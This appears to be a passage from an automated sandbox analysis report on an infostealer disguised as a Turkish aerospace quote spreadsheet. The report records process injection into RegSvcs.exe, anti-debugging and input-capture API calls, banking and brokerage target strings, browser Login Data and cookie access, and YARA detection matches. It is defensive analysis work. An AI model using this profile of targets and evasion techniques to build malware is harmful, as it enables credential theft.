                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003896000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003896000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003896000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003BB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003BB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003896000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003896000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003BB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003BB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003BB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003BB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003896000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003BB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003896000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003BB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003BB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003BB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003BB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003896000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003896000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003BB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003896000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                  Source: RegSvcs.exe, 00000002.00000002.2657054138.0000000000855000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003896000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003896000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003BB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003BB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003896000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003BB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003BB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003BB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003BB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003BB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003BB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003BB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003BB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_050E9548 LdrInitializeThunk,LdrInitializeThunk,2_2_050E9548
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001FEAA2 BlockInput,0_2_001FEAA2
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001B2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_001B2622
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001842DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_001842DE
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001A4CE8 mov eax, dword ptr fs:[00000030h]0_2_001A4CE8
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_018A0648 mov eax, dword ptr fs:[00000030h]0_2_018A0648
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_018A1CA8 mov eax, dword ptr fs:[00000030h]0_2_018A1CA8
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_018A1C48 mov eax, dword ptr fs:[00000030h]0_2_018A1C48
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001E0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_001E0B62
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001B2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_001B2622
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001A083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_001A083F
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001A09D5 SetUnhandledExceptionFilter,0_2_001A09D5
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001A0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_001A0C21
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.raw.unpack, COVID19.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.raw.unpack, FFDecryptor.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.raw.unpack, FFDecryptor.csReference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 5E3008Jump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001E1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_001E1201
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001C2BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_001C2BA5
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001EB226 SendInput,keybd_event,0_2_001EB226
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_002022DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_002022DA
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001E0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_001E0B62
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001E1663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_001E1663
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeBinary or memory string: Shell_TrayWnd
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001A0698 cpuid 0_2_001A0698
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001F8195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_001F8195
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001DD27A GetUserNameW,0_2_001DD27A
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001BB952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_001BB952
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001842DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_001842DE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 00000002.00000002.2658183432.0000000002801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.350000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2656573974.0000000000352000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 7876, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7960, type: MEMORYSTR
                  Source: Yara matchFile source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.350000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2656573974.0000000000352000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 7876, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7960, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeBinary or memory string: WIN_81
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeBinary or memory string: WIN_XP
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeBinary or memory string: WIN_XPe
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeBinary or memory string: WIN_VISTA
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeBinary or memory string: WIN_7
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeBinary or memory string: WIN_8
                  Source: Yara matchFile source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.350000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2656573974.0000000000352000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2658183432.000000000290B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 7876, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7960, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 00000002.00000002.2658183432.0000000002801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.350000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2656573974.0000000000352000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 7876, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7960, type: MEMORYSTR
                  Source: Yara matchFile source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.unpack, type: UNPACKEDPE
